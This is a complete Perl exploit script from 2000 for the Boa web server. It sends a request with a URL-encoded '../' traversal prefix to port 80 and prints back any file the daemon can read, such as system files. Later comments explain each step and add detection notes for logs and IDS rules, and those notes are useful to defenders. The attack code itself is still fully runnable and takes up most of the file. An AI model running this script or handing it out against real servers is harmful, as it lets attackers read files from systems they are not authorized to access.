#!/usr/bin/perl -w

## Boa Web Server Daemon Exploit / Found by Lluis Mora 
##
## Exploit written by teleh0r based on an advisory 
## by Lluis Mora / llmora@s21sec.com / S21SEC
## (http://www.s21sec.com/en/avisos/s21sec-005-en.txt)
##
## This exploit shows the contents of any file that is
## readable by the Boa HTTP daemon. It should work on
## Boa Web Servers below version v0.94.8.3, but only
## as far back as v0.92.x (see the advisory for details).
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use Socket; use strict;

# Both positional arguments (<host> and <file>) are required; without them
# the usage line is printed to STDOUT and the script stops with status 1.
unless (scalar(@ARGV) >= 2) {
    print "Usage: $0 <host> <file>\n";
    exit 1;
}

# Working variables for the rest of the script: the target host, the file
# path to request, the traversal prefix, the finished request line, and the
# values needed to open the TCP connection and read the reply.
my ($host, $file, $url_encoded, $exploit_string,
    $iaddr, $paddr, $proto, $response);

# Both values are taken from the command line as-is; nothing is validated.
($host, $file) = @ARGV;

# Percent-encode every character of the path that matches \w, using the
# lowercase hex of its code point ("%%" is a literal "%" in sprintf).
# Characters that are not \w, such as "/", "." and "-", are left untouched.
# For ASCII word characters (0x30..0x7a) the result is always two hex digits.
# Detection note: a path in which every alphanumeric is percent-encoded is
# unusual for ordinary clients and stands out in request logs.
$file =~ s/(\w)/sprintf("%%%x",ord($1))/ge;

# Make the below string long to be on the safe side!
# ("/%2E%2E/" eq "/../" (URL-encoded.)); ;)

# The repetition count is the string "15", which Perl treats as the number
# 15, so the prefix is fifteen copies of "/%2E%2E/" back to back (adjacent
# copies therefore meet as "//").
# Detection note: a run of consecutive "%2E%2E" path segments at the start
# of the request path is the signature of this request; a server has to
# decode the path before it checks for "..", not after. The header of this
# file names the affected Boa versions; see the cited advisory for the fix.
$url_encoded = "/%2E%2E/"x"15";
# HTTP/1.0 request line terminated by CRLF (\015\012). No Host header or
# any other header is added here.
$exploit_string = "GET $url_encoded$file HTTP/1.0\015\012";

# Build the socket address: resolve the host to a packed IPv4 address, pair
# it with TCP port 80 (hard-coded), and look up the protocol number for TCP.
# NOTE(review): a failed inet_aton() lookup may not set $!, so the message
# printed in that case can be empty or stale - confirm.
$iaddr = inet_aton($host)                    || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
$proto = getprotobyname('tcp')               || die("Error: $!\n");

# Open a TCP stream on the bareword handle SOCKET, connect, and send the
# request in one call. The extra CRLF appended here is the blank line that
# ends the header section, so the request on the wire is the request line
# followed directly by an empty line.
# Detection note: an HTTP/1.0 GET carrying no headers at all, combined with
# the encoded traversal prefix, is what a log or IDS rule would match on.
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)                      || die("Error: $!\n");
send(SOCKET,"$exploit_string\015\012", 0)    || die("Error: $!\n");

# Copy the reply to STDOUT line by line until the read returns undef.
# Nothing is parsed, so the status line and response headers are printed
# along with the body.
while (defined($response = <SOCKET>)) {
    print("$response");
}
# NOTE(review): the script exits with status 1 even after a completed
# exchange, so the exit code does not distinguish success from failure.
close(SOCKET); exit(1);
#                   www.hack.co.za     [12 October 2000]#